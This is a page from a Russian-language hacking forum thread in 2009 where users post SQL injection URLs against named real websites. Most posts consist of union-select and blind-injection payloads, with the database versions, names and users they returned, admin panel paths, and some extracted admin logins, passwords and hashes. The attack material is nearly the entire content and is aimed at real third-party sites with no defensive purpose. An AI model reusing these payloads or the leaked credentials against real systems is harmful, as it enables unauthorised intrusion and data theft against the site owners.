ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8391  
Старый 16.03.2009, 17:31
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

http://www.recipezaar.com/sitenews/post.php?pid=998+and+substring(version(),1,1)=5 5
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),2,1 ))=46 .
http://www.recipezaar.com/sitenews/post.php?pid=998+and+substring(version(),3,1)=0 0
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),4,1 ))=46 .
http://www.recipezaar.com/sitenews/post.php?pid=998+and+substring(version(),5,1)=2 2
http://www.recipezaar.com/sitenews/post.php?pid=998+and+substring(version(),6,1)=2 2
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),7,1 ))=45 -
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),8,1 ))=108 l
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),9,1 ))=111 o
http://www.recipezaar.com/sitenews/post.php?pid=998+and+ascii(substring(version(),10, 1))=103 g

Version: 5.0.22-log
Моя первая блинд-инъекция. Юзера не стал подбирать =).
 
Ответить с цитированием

  #8392  
Старый 16.03.2009, 18:43
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

http://www.etalon-service.com/?module=news&id=-1+union+select+1,2,3,4,5--

Database Version : 5.0.51-log
Database name : u47638
User name : u47638@10.10.12.176

------------------------------------------------------------------------------------------------------------------

http://www.inceram.com.ua/?mod=news&id=-1+union+select+1,2,3,4--

Database Version : 4.1.22-standard-log
Database name : inceram_inceramdb
User name : inceram_inceram@localhost

------------------------------------------------------------------------------------------------------------------

http://www.asstroy-spb.ru/?module=news&id=-1+union+select+1,2,3,4,5--

Database Version : 5.0.51-log
Database name : u41484
User name : u41484@10.10.12.176

------------------------------------------------------------------------------------------------------------------

http://www.basko-textile.ru/?do=news&id=-1+union+select+1,2,3,4--

Database Version : 4.1.22-log
Database name : wwwbaskotextiler
User name : baskotex@localhost

------------------------------------------------------------------------------------------------------------------

http://www.mirkvartir.od.ua/?file=news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--

Database Version : 4.1.22-standard
Database name : mku_mku
User name : mku_db@localhost

------------------------------------------------------------------------------------------------------------------

http://www.bolotov.info/?news&id=-1+union+select+1,2,3,4,5,6,7--

Database Version : 4.1.22
Database name : bolotov_admin
User name : bolotov_mysql@10.1.38.66
--------------------------------------------------------------------------------------------------------

АДМИН:

http://www.bolotov.info/?news&id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6,7+from+admin--

Login: cassej
Pass: 7459

Последний раз редактировалось jokester; 16.03.2009 в 19:10.. Причина: объединяй посты
 
Ответить с цитированием

  #8393  
Старый 16.03.2009, 19:35
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

Цитата:
http://www.goczech.cz/index.php?c=detail&id=281+union+select+concat_ws(0 x3a,version(),database(),user()),2,3,4,5--
Database Version: 4.0.25-log
Database name: goczech
User name: goczech@10.1.1.9



админка

http://goczech.cz/admin
 
Ответить с цитированием

  #8394  
Старый 16.03.2009, 19:38
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

http://www.altist.ru/page.php?action=static&id=-3+union+select+1,2,3,4

Database Version: 5.0.75
Database name: altista_1
User name: altista_1@localhost

Login: admin
Pass: 43e9a4ab75570f5b : admin

Админку не нашел(((
 
Ответить с цитированием

  #8395  
Старый 16.03.2009, 19:50
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
Unhappy

F4R, хз чё эт такое
hashcracking.info сказал что пасс admin

по теме:
http://www.parket-junckers.ru/index.phtml?action=news&id=-1+union+select+1,2,3,4,5,6--

Database Version: 5.0.75
Database name: parketjn_parket
User name: parketjn_parket@localhost
 
Ответить с цитированием

  #8396  
Старый 16.03.2009, 20:02
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.inm-lex.ro/index.php?MenuID=-4+union+select+1,2,3,unhex(hex(concat_ws(0x3a,vers ion(),database(),user()))),5--


Database Version: 5.0.18-log
Database name: inmlexro_inm
User name: inmlexro@www1.linux.romtelecom.net.
 
Ответить с цитированием

  #8397  
Старый 16.03.2009, 20:13
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

http://aviaresurs.ru/?act=news&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,version( ))),3,4,5--

Database Version: 4.1.14
Database name: aviaresurs
User name: aviablabla@localhost

Login: admin
Pass: gh4yxJ6CnipwA : ??

Админка:

http://aviaresurs.ru/admin/
 
Ответить с цитированием

  #8398  
Старый 16.03.2009, 20:40
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.woodlandheritage.org.uk/display.php?id=-31+union+select+1,2,3/*

Database Version: 4.1.22-standard
Database name: woodlandheritage
User name: woodlandheritage@gcs.eliteukserve.net

http://www.look-cctv.co.uk/display.php?page=News&article=-33+union+select+1,2,3,4,5,6,7,8+users/*

Database Version: 4.0.26-nt
Database name: lookcctv
User name: lookcctv@thulium.airtime.co.uk

4о за поля в users?отпишите в личку если найдете плз!

http://www.artandframing.co.uk/tradefair/art-display/art-display.php?id=81/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21/**/LIMIT/**/1,1/*


Database Version: 4.1.19-standard-log
Database name: artandframing
User name: artandframing@localhost

http://www.designaventure.co.uk/display.php?id=71/**/UNION/**/SELECT/**/1,2,3/*

Database Version: 4.1.22
Database name: stag_db
User name: stag@localhost

Последний раз редактировалось Rubaka; 16.03.2009 в 21:34.. Причина: добавил ишо!
 
Ответить с цитированием

  #8399  
Старый 16.03.2009, 21:11
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

Код:
http://yamamotoprintmaking.com/catalog.php?a=category&id=-4+union+select+concat(user(),0x3a,version(),0x3a,database())
Database Version: 4.1.22-STANDARD-LOG
Database name: YAMAMOTOPRINTMAKING
User name: YAMAMOTO@LOCALHOST

Код:
http://marqueesole.com/php/client/product.php?id=-124+union+select+concat(login,0x3a,passwd)+from+admin
Database Version: 5.0.67-log
Database name: marqueesole_main
User name: msmainuser@scalise.dreamhost.com

Код:
http://www.salesbearing.com/products/product.php?id=-42+union+select+1,concat(username,0x3a,pwd),3,4+from+admin
Database Version: 5.0.40-log
Database name: nrworld
User name: nrworld@121.52.209.130
 
Ответить с цитированием

  #8400  
Старый 16.03.2009, 21:47
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

Цитата:
http://www.archaeolog.ru/?id=2&id_nws=99&zid_nws=-4+union+select+version()--

Database Version: 5.0.45
Database name: archaeolog
User name: archaeolog@localhost


АДМИНКО=)
http://www.archaeolog.ru/admin/
Lopatin:L8XiGk:nvl@archaeolog.ru
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ